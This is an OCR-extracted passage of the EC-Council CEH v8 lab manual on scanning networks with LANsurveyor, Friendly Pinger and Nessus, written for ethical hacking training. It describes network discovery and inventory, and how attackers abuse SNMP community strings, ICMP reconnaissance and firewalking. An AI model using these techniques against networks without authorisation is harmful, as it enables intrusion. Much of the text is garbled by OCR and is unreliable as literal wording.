  • 72. Module 03 - Scanning Networks r Getting Started with LANsurveyor ■ a u so la rw in ds7' V/atch a vd ae n t'o to barn more What you can do with LANsurveyor. Scan and map Layer 1. 2. 3 network topology &] Export maps to Microsoft V tito » View example mgp "2 Continuously scan your network automatically Onca aavod, a I cuatom ‫׳‬nap■a ca r be u otd m SelarV/nda n o t/.o ‫׳‬k and opplcator managerrcnt software, le arn more » » thwack LANsurveyor forum th w a c k is 8 community site o ro vidiro S o b r t V rd s j s e ‫־‬s w ith u sefu l niom ato n. to o s and v a u a b le re so jrc e s » Qnfcne Manual For additional hep on using the LAIJsu‫־‬veyor read the LANSurveyor Administrator Gude » Evaluation Guide T ha L A M au rvayor Evaiuabon Guida p rc v d a a an irtr» d1»cton to L A M au rvayor faaturaa a r d ra tn ic b c n a fe r n tta lin j. c o n fg u r n j, and jsm g L AH surveyor. » Support T h e S o h rw in d s S upoorl W e b * i» o ffe r* a s e n p re h e rs v e set o f tool* to help y o u n a n a o e a ‫׳‬uJ n a rta m y o » r S oh rW ind * appleations v b t tne <ii^yd£a1 £ .ea2s, f i c ^ t y Q vy»t9»». or Jp o a ic ] [Start S c a n rirg fJet.‫.׳‬ o ‫־‬k I IDon't show agah FIGURE 8.4: Getting Started with LANSurveyor Wizard 5. The Create A Network Map window will appears; in order to draw a network diagram enter the IP address in Begin Address and End Address, and click Start Network Discovery fi LANsurveyor uses a number of techniques to map managed switch/hub ports to their corresponding IP address nodes. It's important to remember switches and hubs are Layer 2 (Ethernet address) devices that don't have Layer 3 (IP address) information. Ethical H acking and Counterm easures Copyright O by EC-Coundl All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 155
  • 73. ‫־‬ ‫מ‬Create A New Network Map Module 03 - Scanning Networks Netuioik Paraneetr H op s EecinAcdies; Erd Address 10.00.1 10.D.0.254 Enter Ke>tAddressHere (Folowtrg cuter hopj requires SNMPfouleraccess! Rotfers. Switches and□her SNMPDe/ice Dijcovery ■-M* 0 SNMPvl D*vk#j ••SMMP/I CommunityStrng(*) =‫=&־‬ [ p tfe fc private QSHWPv2cDevices•• SNMPv2cCommunityStrngfs) | pubiu. pmats QSNNPv3Devices I SNMPv3Options.. Other IPServiceDixovery Ivi LANsuveya Fejpcnder; LANsurvefo*Responder Password:1jP I IActve Directory DCs SlCMPprg) 0Nel8ICS Ciwvs MSPCSer* Mapping Speed FasterSlower 0 Configuration Ma^aperon* IDiscovery Donf^uiaiijn..Save0ixovery Confgwaiion. StartNotv»o*kDioco/cry| Cored FIGURE 8.5: New Network Map window 6. The entered IP address mapping process will display as shown in the following figure Mapping Progress Searching for P nodes HopO: 10.0.0.1 - 10.0.0.254 Last Node Contacted: WIN-D39MR5HL9E4 SNMP Sends SNMP Recess: ICMP Ping Sends: ICMP Receipts Subnets Mapped Nodes Mapped Routers Mapped Switches Mapped Cancel FIGURE 8.6:Mapping progress window 7. LANsurveyor displays die map of your network — LANsurveyor's network discovery discovers aU network nodes, regardless ofwhether they are end nodes, routers, switches or any other node with an IP address 03 LANsurveyor rs capable of discovering and mappmg multiple VLANs on Layer 2. For example, to map a switch connecting multiple, non- consecutive VLANs Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 156
  • 74. Module 03 - Scanning Networks SclaAVinds LANsurveyor - [Map 1] | ^ = X ■ M e Edit Manage Monitor Report Tools A v d o w Help ‫■־‬1-1- ‫נ‬ & h 00 j 1* 151 v s 3 a 0 a s r&© ♦ ‫׳‬ | solarwinds •‫׳‬ KH‘>e ©. id *T |100*; v & m o ‫־־‬ 111 Overview f*~| veisor W1N-DWlllR»lLSt4 WIN D3JI H5HJ *« W ti '.'SilLCM W I Wf.-WSC'tlXMK-O ‫׳‬non•' 1 00 9 1 0.0.255(.•-0.0‫.נ‬‫נ‬.­ - ■ ‫״‬V*4UCONJWRSfWW MN-LXQN3WRJNSN 10006 12- Network Segments (1} P Addresses (4) Domain Names (4) Node Names (4) fP R euter LANjurveyor Responder Nodes SNMP Nodes SNMP Svntches H ubs SIP (V0IPJ Nodes layer J Nodes Actrve Directory DCs Groups E tf=d ff£ - 4 M ffc- hC as * ft FIGURE 8.7: Resulted network diagram Lab Analysis Document all die IP addresses, domain names, node names, IP routers, and SNMP nodes you discovered during die lab. T ool/U tility Inform ation Collected/O bjectives Acliieved LANSurveyor IP address: 10.0.0.1 -10.0.0.254 IP N odes Details: ■ SNMP Send - 62 ■ ICMP Ping Send 31‫־‬ ■ ICMP Receipts 4 ‫־‬ ■ Nodes Mapped 4 ‫־‬ N etw ork segm ent Details: ■ IP Address - 4 ■ Domain Names - 4 ■ Node Names - 4 Q LANsurveyor Responder Clients greatly enhance the functionality of LANsurveyor by providing device inventory and direct access to networked computers. Ethical H acking and Counterm easures Copyright O by EC‫־‬Coundl All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 157
  • 75. Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B . Module 03 - Scanning Networks Questions 1. Does LANSurveyor map every IP address to its corresponding switch or hub port? 2. Can examine nodes connected via wireless access points be detected and mapped? Internet Connection Required □ Yes 0 No Platform Supported 0 Classroom 0 iLabs Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 15S
  • 76. Module 03 - Scanning Networks Mapping a Network Using Friendly Pinger Friendly Pingeris a user-friendlyapplicationfor network administration, monitoring, andinventory Lab Scenario 111die previous lab, you found die SNAIP, ICMP Ping, Nodes Mapped, etc. details using die tool LANSurveyor. If an attacker is able to get ahold of this information, he or she can shut down your network using SNMP. They can also get a list of interfaces 011 a router using die default name public and disable diem using die read- write community. SNMP MIBs include information about the identity of the agent's host and attacker can take advantage of diis information to initiate an attack. Using die ICMP reconnaissance technique an attacker can also determine die topology of die target network. Attackers could use either die ICMP ,’Time exceeded" or "Destination unreachable" messages. Bodi of diese ICMP messages can cause a host to immediately drop a connection. As an expert Network Administrator and Penetration Tester you need to discover network topology and produce comprehensive network diagrams for discovered networks and block attacks by deploying firewalls 011 a network to filter un-wanted traffic. You should be able to block outgoing SNMP traffic at border routers or firewalls. 111diis lab, you will leani to map a network using die tool Friendly Pinger. Lab O bjectives The objective of diis lab is to help students discover and diagram network topology and map a discovered network. h i diis lab, you need to: ■ Discover a network using discovery techniques ■ Diagram the network topology ■ Detect new devices and modifications made in network topology ■ Perform inventory management for hardware and software assets ICON KEY 2 7 Valuable information Test your knowledge ‫ס‬ W eb exercise m W orkbook review Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 159
  • 77. Module 03 - Scanning Networks Lab Environm ent To perform die lab, you need: ■ Friendly Pinger located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksNetwork Discovery and Mapping ToolsFriendlyPinger ■ You can also download the latest version of Friendly Pinger from the link http :// www.kilievich.com/fpinge17dovnload.htm ■ If you decide to download the latest version, dien screenshots shown in die lab might differ ■ A computer running Windows Server 2012 ■ A web browser widi Internet access ■ Administrative privileges to run die Friendly Pinger tool Lab Duration Time: 10 Minutes O verview of N etw ork Mapping Network mapping is die study of die physical connectivity of networks. Network mapping is often carried out to discover servers and operating systems ruining on networks. This tecluiique detects new devices and modifications made in network topology You can perform inventory management for hardware and software assets. Friendly Pinger performs the following to map the network: ■ Monitoring network devices availability ■ Notifies if any server wakes or goes down ■ Ping of all devices in parallel at once ■ Audits hardware and software components installed on the computers over the network Lab Tasks 1. Install Friendly Pinger 0x1 your Windows Server 2012 2. Follow die wizard-driven installation steps and install Friendly Pinger. 3. Launch the Start menu by hovering die mouse cursor in die lower-left corner of the desktop ZZ7 Tools demonstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks t a s k 1 Draw Network Map Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 160
  • 78. Module 03 - Scanning Networks FIGURE 9.1: Windows Server2012- Desktop view 4. Click the Friendly Pinger app to open the Friendly Pinger window Start Administrator ^ Sen*r Manager Windows PowerSMI GOOQte Chrome Uninaall r_ m * % & Com piler Control Panol V H y p «-V Machine.. 9 ¥ £ Eaplewr Command Prompt !‫ר״‬ M02111a Firefbx €> Path Ana»/zer Pro 2.7 i l ■ K m SmnfcOL. Fnendty PW^ff O rtef o fl* IG FIGURE 9.2 Windows Server 2012- Apps 5. The Friendly Pinger window appears, and Friendly Pinger prompts you to watch an online demonstration. 6. Click No Friendly Pinger [Demo.mapl H ‫ם‬ 1 fife E dit V ie w P in q N o tific a tio n S can F W a tc h c r Inven tory H elp 1‫צ‬ □ &£ - y a fit ‫־‬ * V D oto * ‫׳‬ - Demonstration map In la n d M.ui Sh u ll cut S m v ti s - WoikStation WndcStation (*mall) ^ 21/24/37 & OG00:35dick the client orco to add ‫ג‬ new derice... FIGURE 9.3: FPinger Main Window Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited ^ You are alerted when nodes become unresponsive (or become responsive again) via a variety of notification methods. Friendly Pinger will display IP-address ofyour computer and will offer an exemplary range of IP- addresses for scanning & To see the route to a device, right-click it, select "Ping, Trace" and then "TraceRoute". In the lower part of the map a TraceRoute dialog window will appear. In the process of determination of the intermediate addresses, they will be displayed as a list in this window and a route will be displayed as red arrows on the map C E H Lab M anual Page 161
  • 79. 7. Select File from the menu bar and select die Wizard option L-!»j x ‫׳‬ Module 03 - Scanning Networks r FriendlyPinger [Demo.map] F ile | Edit View P in g N o tific a tio n Scan F /fa tc l‫»׳‬er In ve n to ry H elp ft x!‫צ‬%‫־‬*C*‫י‬ 5 T In la n d fr! S c iy c i Internet Hail Shoitcul ServerHob --------- Mnriem □ WeA Gtfr Open... CtrUN Ctil+O Reopen | Uadate U S a v e . S«v« At... Clow t b Close A ll ► Ctr!‫־‬»U CtrUS fc V Save A s Im age... ^ Print... g‫מ‬ m‫ד‬‫ק‬ ^ Lock... ^ Create Setup... Ctrl'-B 0 Options... F9 X L Frit Alt*■)( WinkStatiun I1,11| J J Workstation a r'r;m O dll initial llldLCicdt FIGURE 9.4: FPinger Starting Wizard 8. To create initial mapping of the network, type a range of IP addresses in specified field as shown in the following figure click Next -----Wizard 10.0.0.7Local IP address: The initial map will be created by query from DNS-server the information about following IP-addresses: 10.0.0.1 •2d You can specify an exacter range of scanning to speed up this operation. For example: 10.129-135.1 •5.1 •10 1000| ITimeout Timeout allows to increase searching, but you can miss some addresses. X Cancel=►Mext4 * gack? Help FIGURE 9.5: FPinger Intializing IP address range 9. Then the wizard will start scanning of IP addresses 111 die network, and list them. 10. Click Next ‫ם‬ Scanning allows you to know a lot about your network. Thanks to the unique technologies, you may quickly find all the HTTP, FTP, e-mail and other services present on your network C] Map occupies the most part of the window. Right- clickit. In the appeared contest menu select "Add” and then ‫״‬Workstation". A Device configuration dialog windowwill appear. Specify the requested parameters: device name, address, description, picture The device is displayed as an animated picture, if it is pinged, and as a black and white picture if it is not pinged Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 162
  • 80. Module 03 - Scanning Networks Wizard NameIP address W1N-MSSELCK4K41 Windows8 W1N-LXQN3WR3R9M W1N-D39MR5HL9E4 0 10.0.0.2 0 10.0.0.3 0 10.0.0.5 □ 10.0.0.7 The inquiry is completed. 4 devices found. Remove tick fromdevices, which you dont want to add on the map X Cancel3 ‫־‬►Next4 * Back? Help FPinger 9.6: FPmger Scanning of Address completed 11. Set the default options in the Wizard selection windows and click Next Wizard WorkstationQevices type: Address O Use IP-address | ® Use DNS-name | Name ‫ח‬ Remove DNS suffix Add*ion OAdd devices to the new map (•> Add devices to the current map X Cancel!► Next7 Help £L) Press CTRL+I to get more information about the created map. You will see you name as the map author in the appeared dialogwindow £0 Ping verifies a connection to a remote host by sending an ICMP (Internet Control Message Protocol) ECHO packet to the host and listening for an ECHO REPLY packet. A message is always sent to an IP address. If you do not specify an address but a hostname, this hostname is resolved to an IP address usingyour default DNS server. In this case you're vulnerable to a possible invalid entry on your DNS (Domain Name Server) server. FIGURE 9.7: FPinger selecting the Devices type 12. Then the client area will displays the Network map in the FPinger window C E H Lab M anual Page 163 Ethical H acking and Counterm easures Copyright © by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited
  • 81. Module 03 - Scanning Networks _ □1 x ‫י‬V Friendly Pinger [Default.map] F ile Edit View/ P in g N o tificaT io n S can F W a tch e r in v e n to ry H e lp H ‫>׳״‬ £ ft J* & g FIGURE 9.8 FPmger Client area with Network architecture 13. To scan the selected computer in the network, select die computer and select the Scan tab from the menu bar and click Scan Friendly Pinger [Default.map] Scan FWrtchp Inventory Help F61 50* mM Scan.. file Edit View Ping Notification Lb‫ם‬ - y a * e? ^ 00:00:47233:1 3 / i/ 4clickthe clicnt areato add snew devicc.. FIGURE 9.9: FPinger Scanning tlie computers in the Network 14. It displays scanned details in the Scanning wizard ‫ם‬ If you want to ping inside the network, behind the firewall, there will be no problems If you want to ping other networks behind the firewall, it must be configured to let the ICMP packets pass through. Your network administrator should do it for you. Same with the proxy server. ^ You may download the latest release: http:/ /www.kilievich.com/ fpinger. Q Select ‫״‬File|Options, and configure Friendly Pinger to your taste. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 164
  • 82. Module 03 - Scanning Networks Scanning Command faCompute W1N-MSSELCK... http://W IN-MSSELCX4M1 W1N-D39MR5H... http://WIN-D39MR5HL9E4 Scanning com plete ^‫׳‬JBescan Service & ] HTTP £ ] HTTP Progress y o k X Caned? Help £□ Double-click tlie device to open it in Explorer. FIGURE 9.10: FPinger Scanned results 15. Click the Inventory tab from menu bar to view die configuration details of the selected computer T ^ r r ‫־‬Friendly P h g er fDefault.maplV P k Edit V 1« w P in g N o tific a tio n S<*n F W a tch cr I rv c n to ry N d p ___________________ 1‫ג‬ Ca:*BSJ &^ ‫׳‬ * m E l InventoryOption!.‫״‬ Ctil-F# FIGURE 9.11: FPinger Inventory tab 16. The General tab of the Inventory wizard shows die computer name and installed operating system £□ Audit software and hardware components installed on tlie computers over the network Tracking user access and files opened on your computer via the network Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 165
  • 83. Module 03 - Scanning Networks InventoryW File Edit View Report Options Help 0 ‫־‬S ? 1 1 ■ Ela e: | g General[ Misc| M 'j Hardware] Software{ _v) History| ^ K > Computer/User Hos* name |WIN-D39MR5HL9E4 User name !Administrator Windows Name |Windows Server 2012 Release Candriate Datacenter Service pack Cotecton tme Colecbon time 18/22/201211:22:34 AM WIN-D39MR5HL9E4 FIGURE 9.12: FPinger Inventory wizard General tab 17. The Misc tab shows the Network IP addresses. MAC addresses. File System, and Size of the disks x 'Inventory File Edit View Report Options Help e i g? 0 ₪ *a a © G*? fieneraj Misc hardware | Software | History| Network IP addresses MAC addresses 110.0.0.7 D4-BE-D9-C3-CE-2D Jotal space Free space 465.42 Gb 382.12 Gb Display $ettng$ display settings [1366x768,60 Hz, True Color (32 bit) Disk Type Free, Gb Size, Gb £ File System A 3 C Fixed 15.73 97.31 84 NTFS S D Fixed 96.10 97.66 2 NTFS — - — ■ — FIGURE 9.13: FPinger Inventory wizard Misc tab 18. The Hardware tab shows the hardware component details of your networked computers CQ Assignment of external commands (like telnet, tracert, net.exe) to devices 5 Search of HTTP, FTP, e-mail and other network services Function "Create Setup" allows to create a lite freeware version with your maps and settings Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 166
  • 84. Module 03 - Scanning Networks T T File Edit View Report O ptions Help 0 ^ 1 3 1 0 H w 1N-D39MFS5HL9E4|| General Miscl Mi H a rd w a re [^ ] Software History | < > 1 4x Intel Pentium III Xeon 3093 B Memory <24096 Mb - Q j BIOS Q| AT/AT COMPATIBLE DELL • 6222004 02/09/12 - £ ) ‫י‬ Monitors Genetic PnP Monitor - ■ V Displays adapters B j) lnte<R) HD Graphics Family E O Disk drives q ST3500413AS (Serial: W2A91RH6) - ^ Network adapters | j | @netrt630x64.inf,%rtl8168e.devicedesc%^ealtekPQeGBE Family Controller - ^ SCSI and RAID controllers @spaceport.inf,%spaceport_devicedesc%;Micro$oft Storage Spaces Controller I J FIGURE 9.14: FPinger Inventorywizard Hardware tab 19. The Software tab shows die installed software on die computers ------------------ HInventory File Edit View Report Options Help 1 0€ 1 3‫י‬0[£) Q5r G§* general | M‫׳‬sc H«fdware| S Software History | QBr < > Adobe Reader X (10.1.3) eMaiTrackerPro EPSON USB Display Friendfy Priger IntelfR) Processor Graphics Java(TM) 6 Update 17 Microsoft .NET Framework 4 Multi-Targeting Pack Microsoft Appfcation Error Reporting Microsoft Office Excel MUI (English) 2010 Microsoft Office OneNote MUI (English) 2010 Microsoft Office Outlook MUI (English) 2010 Microsoft Office PowerPoint MUI (English) 2010 Microsoft Office Proof (English) 2010 Microsoft Office Proof (French) 2010 Microsoft Office Proof (Spanish) 2010 Off*** Prnnfirxi (Pnnli^hl ? fllfl A V TetaS Name Version Developer Homepage | f t Go WIN-D39MR5HL9E4 FIGURE 9.15: FPinger Inventory w!2ard Software tab Lab Analysis Document all die IP addresses, open and closed ports, services, and protocols you discovered during die lab. Q Visualization of your computer network as a beautiful animated screen Ethical H acking and Counterm easures Copyright O by EC‫־‬Coundl All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 167
  • 85. Module 03 - Scanning Networks T ool/U tility Inform ation Collected/O bjectives Achieved IP address: 10.0.0.1 -10.0.0.20 Found IP address: ■ 10.0.0.2 ■ 10.0.0.3 ■ 10.0.0.5 ■ 10.0.0.7 Details Result of 10.0.0.7: FriendlyPinger ■ Computer name ■ Operating system ■ IP Address ■ MAC address ■ File system ■ Size of disk ■ Hardware information ■ Software information Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B . Questions 1. Does FPinger support proxy servers firewalls? 2. Examine the programming of language used in FPinger. Internet Connection Required □ Yes 0 No Platform Supported 0 Classroom 0 iLabs Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 168
  • 86. Module 03 - Scanning Networks Lab Scanning a Network Using the NessusTool Nessusallowsyou to remotelyaudita netirork anddetermineif it has been broken into ormisusedin somen‫׳‬ay. It alsoprovides the ability to locallyaudita specific machinefor vulnerabilities. Lab Scenario 111 the previous lab, you learned to use Friendly Pinger to monitor network devices, receive server notification, ping information, track user access via the network, view grapliical traceroutes, etc. Once attackers have the information related to network devices, they can use it as an entry point to a network for a comprehensive attack and perform many types of attacks ranging from DoS attacks to unauthorized administrative access. If attackers are able to get traceroute information, they might use a methodology such as firewalking to determine the services that are allowed through a firewall. If an attacker gains physical access to a switch 01 other network device, he or she will be able to successfiUly install a rogue network device; therefore, as an administrator, you should disable unused ports in the configuration of the device. Also, it is very important that you use some methodologies to detect such rogue devices 011 the network. As an expert ethical hacker and penetration tester, you must understand how vulnerabilities, compliance specifications, and content policy violations are scanned using the Nessus rool. Lab O bjectives This lab will give you experience 011 scanning the network for vulnerabilities, and show you how to use Nessus. It will teach you how to: ■ Use the Nessus tool ■ Scan the network for vulnerabilities I CON KEY ‫־‬7=7 Valuable mformation s Test your knowledge Web exercise m W orkbook review* Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 169
  • 87. Module 03 - Scanning Networks Lab Environm ent To cany out die lab, you need: ■ Nessus, located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksWulnerability Scanning ToolsNessus ■ You can also download the latest version of Nessus from the link http: / / vwv.tenable.com / products/nessus/nessus-download- agreement ■ If you decide to download the latest version, then screenshots shown in the lab might differ ■ A computer running Windows Server 2012 ■ A web browser with Internet access ■ Administrative privileges to run the Nessus tool Lab Duration Time: 20 Minutes O verview of Nessus Tool Nessus helps students to learn, understand, and determine vulnerabilities and weaknesses of a system and network 111 order to know how a system can be exploited. Network vulnerabilities can be network topology and OS vulnerabilities, open ports and running services, application and service configuration errors, and application and service vulnerabilities. Lab Tasks 1. To install Nessus navigate to D:CEH-ToolsCEHv8 Module 03 Scanning NetworksWulnerability Scanning ToolsNessus 2. Double-click the Nessus-5.0.1-x86_64.msi file. 3. The Open File - Security Warning window appears; click Run ‫ך‬5‫־ד‬Open File Security Warning D o y o u w a n t t o ru n th is fie ? fJa n e ‫־‬ /lk g rtA d m in irtrat0 rD etH 0 D 'v N ecs1 K -5 0 2 -6 £ &‫ר‬C.rrK P u d s h t ‫׳‬: Ic n a M c N e tw o r k S e c u rity Int. T y p e W in dow s Installer Package From; C ;lbcm Adm ini3t‫׳‬ato1DoklopNe11u1-5.02-*66 $4-. CencHRun V Alw ays esk cefcre opening th e file W h Jr fi: « fro m t h e Int& net can b e useful, th is file ty p e can potentially harm >our c o m p u ter O nly run softw are from p u b ltih en y e n tru st ^ W hat s the nsk? £ ‫ז‬ Tools demonstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks m Nessus is public Domain software related under the GPL. 8 T A s K 1 Nessus Installation "^7 Nessus is designed to automate the testing and discovery of known security problems. FIGURE 10.1: Open File ‫־‬ SecurityWarning Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 170
  • 88. Module 03 - Scanning Networks 4. The Nessus - InstallShield Wizard appears. Dining the installation process, the wizard prompts you for some basic information. Follow die instructions. Click Next. Tenable Nessus (x64) ‫־‬ InstallShield Wizard$ Welcome to the InstallShield Wizard for Tenable Nessus (x64) The InstalSh1eld(R) W izard wdl n s ta l Tenable Nessus (x64) on your computer. To continue, d d c Next. WARNING: T h s program is protected by copyright law and nternational treaties. < Back N ext > Cancel FIGURE 10.2: The Nessus installation window 5. Before you begin installation, you must agree to the license agreement as shown in the following figure. 6. Select the radio button to accept the license agreement and click Next. Tenable Nessus (x64) - InstallShield Wizard!‫;ל‬ L ic e n se A g r e e m e n t Please read the following k e n se agreement carefully. 0 Tenable Network Security, Inc. NESSUS® software license Agreement This is a legal agreement ("Agreement") between Tenable Network Security, Inc., a Delaware corporation having offices at 7063 Columbia Gateway Drive. Suite 100, Columbia, MD 21046 (“Tenable"), and you, the party licensing Software (“You‫.)״‬ This Agreement covers Your permitted use of the Software BY CLICKING BELOW YOU !unir.ATF v m iB Ar.r.FPTAMr.F np tw/.qArtPFPMFUT auh Printaccept the terms in the k e n s e agreement O I do not accept the terms n the k e n se agreement InstalShiekJ-------------------------------------------------------------- CancelNext >< Back FIGURE 10.3:Hie NessusInstall ShieldWizard 7. Select a destination folder and click Next. m The updated Nessus security checks database is can be retrieved with commands nessus-updated- plugins. Q Nessushasthe abilityto test SSLizedservices suchas http, smtps, imapsandmore. Nessus securityscanner includesNASL (Nessus Attack ScriptingLanguage). Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 171
  • 89. Module 03 - Scanning Networks Tenable Nessus (x64) - InstallShield Wizard D e stin a tio n Fold e r Click Next to instal to this folder, or ckk Change to instal to a different folder. Change... Instal Tenable Nessus (x64) to: C:Program FtesTenableNessus£> InstalShield CancelNext >< Back FIGURE 10.4:Tlie NessusInstall ShieldWizard 8. The wizard prompts for Setup Type. With die Complete option, all program features will be installed. Check Complete and click Next. Tenable Nessus (x64) ‫־‬ InstallShield Wizard S e t u p T y p e Choose the setup type that best smts your needs. FIGURE 10.5: The Nessus Install Shield Wizard for Setup Type 9. Tlie Nessus wizard will prompt you to confirm the installation. Click Install Ibdl Nessus givesyouthe choice forperformingregular nondestructive security audit on aroutinelybasis. Q Nessusprobes arange ofaddresseson a networkto determinewhichhosts are alive. Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 172
  • 90. Module 03 - Scanning Networks Tenable Nessus (x64) - InstallShield Wizard R e a d y to In st a ll th e P ro g ra m The wizard is ready to b egn n stalation . Click Instal to begn the nstalatoon. If you want to review or change any of your installation settings, dfck Back. Ckk Cancel to exit the wizard. InstalShield CancelInstal< Back Nessusprobes network serviceson eachhostto obtain banners that contain softwareand OSversion informatioa FIGURE 10.6: Nessus InstallShield Wizard 10. Once installation is complete, click Finish. Tenable Nessus (x64) ‫־‬ InstallShield Wizard InstalShield Wizard Completed The InstalShield Wizard has successfuly nstaled Tenable Nessus (x64). Ckk Finish to exit the wizard. Cancel Q Path ofNessus home directoryforwindows programfilestanablenessus FIGURE 10.7: Nessus Install Shield wizard Nessus Major Directories ■ The major directories of Nessus are shown in the following table. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 173
  • 91. Module 03 - Scanning Networks Nessus Home D irectory Nessus S ub-D irectories Purpose 1W indows Program FilesTenableNessus conf Configuration files data Stylesheet templates nessusplugins Nessus plugins nassusus«rs<username>lcbs User knowledgebase saved on disk >----------------------- - n o 3 3 u s l o g s 1 --------------------------1 , Nessus log flies TABLE 10.1: Nessus Major Directories 11. After installation Nessus opens in your default browser. 12. The Welcome to Nessus screen appears, click die here link to connect via SSL w e lc o m e to Nessus! PIm m c o n n e c t v ia S S L b y click in cJ h » r « . Y o u a r e hkely to g e t a se cu rity alert from you r w e b b r o w ser sa y in g th a t th e SSL c er tific a te is in valid . Y ou m ay e ith er c h o o s e t o tem p o ra rily a c c e p t t h e risk, or c a n o b ta in a valid SSL c er tific a te from a registrar. P le a se refer t o th e N e ss u s d o c u m e n ta tio n for m o re in form ation . FIGURE 10.8: Nessus SSLcertification 13. Click OK in the Security Alert pop-up, if it appears Security Alert Jj You are about toviewpages over a secure connection. Any informationyou exchange withthis site cannot be viewed by anyone else onthe web. ^Inthefuture, do not showthis warning ‫ע‬ More InfoOK FIGURE 10.9: Internet Explorer Security Alert 14. Click the Continue to this w ebsite (not recommended) link to continue feUI Duringthe installation and dailyoperationof Nessus, manipulatingthe Nessus serviceisgenerallynot required — T h e Nessus Server Manager used in Nessus 4 has been deprecated Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 174
  • 92. Module 03 - Scanning Networks 1&* ^ II Ccrtficate Error: Mavigation... ' X Snagit g j £t There is a problem with this website's security certificate. Thesecurity certificate presented by this website was not issued by a trusted certificate authority. Thesecurity certificate presented by this websrte was issued for a different website's address. Sccunty certificate problems may indicate an attempt to fool you or intercept any data you send to the server. Wc recommend that you close this webpage and do not continue to this website. d Click here to close this webpage. 0 Continue to this website (not recommended). More information FIGURE 10.10: Internet Explorer website’s security certificate 15. on OK in the Security Alert pop-up, if it appears. Security Alert 1C. i) ^ou are a^outt0 viewpages over a secure connection Any informationyou exchange withthis site cannot be viewed by anyone else onthe web. HI Inthefuture, do not showthis warning 1 More InfoOK FIGURE 10.11: Internet Explorer SecurityAlert 16. Tlie Thank you for installing Nessus screen appears. Click the Get Started > button. R ff £Q! Due to dietechnical implementation ofSSL certificates,itisnot possible to ship a certificatewith Nessus thatwould be trusted to browsers •>>< h * i 1i Nwmu* dllimi v»u to pwloiin W e lc o m e t o N e s s u s ‫׳‬ T W 1k you loi I11«ldlll1•j tin• wuM 1 1I *ah 3pe«d vulnerability discovery, to <Je?e‫־׳‬r re *Ivcn hcets are njmlna nhich se1v1r.es 1AijnnlUiai Auditing, la 1m U wt« no Im l )■ » ia aacurlty |W ■I■>!! >L-umplianca chocks, to verify and prove that eve‫־‬, host on your network adheres to tho security potcy you 1 ‫י‬ Scan scliHliJing, to automatically iu i *cant at the you ‫׳‬ And morel !!•< stofted > FIGURE 10.11: Nessus Getting Started 17. 111 Initial Account Setup enter the credentials given at the time of registration and click Next > m warning, a custom certificateto your organizationmustbe used Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 175
  • 93. Module 03 - Scanning Networks Wefconeu Neausp • o («*•*<‫>״.»*״‬. e c In itia l Account Setup First, we need to create an admin user for the scanner. This user will have administrative control on the scanner; the admin has the abilityto create/deiete users, stop ongoing scans, and change the scanner configuration. loo*n: admin Confirm P.ivwvoiri. < Prev | Next > | Because fAeadmin user can change the scanner configuration, the admin has (he ability to execute commands on the remote host. Therefore, It should be i that theadmin user has the same privilegesas the *root‫״‬ (or administrator) user on the remote ho■ FIGURE 10.12: Nessus Initial Account Setup 18. 111Plugin Feed Registration, you need to enter die activation code. To obtain activation code, click the http://www.nessus.org/register/ link. 19. Click the Using Nessus at Home icon in Obtain an Activation Code mi(A*CAftCMin‫ז‬ <9>TENABLE Network Security* I n CertiriMtion Resources Support Obtain an Activation Code Using Nesaus al Work? Using Nessus at Home? A l’1nW*a4» . ^ - ‫״‬ A Ham■(■ml lUbtCltpMl Is wUk1uV4cM* fu< all DM 4r«l tec h tm Mia ootj in IriM hlr Product*. PiotfuUOi'eniB* Nksui AudHai .1ndi■ N w m Plug** .Sjirplr Repom N«MUiFAQ Vk«le Ostlrtt FAQ Dtptovmam1>:001u Mewos Evukoiion Training > ■ el m Ifyouareusingtlie Tenable SecurityCenter, the ActivationCode andplugin updates aremanagedfrom SecurityCenter. 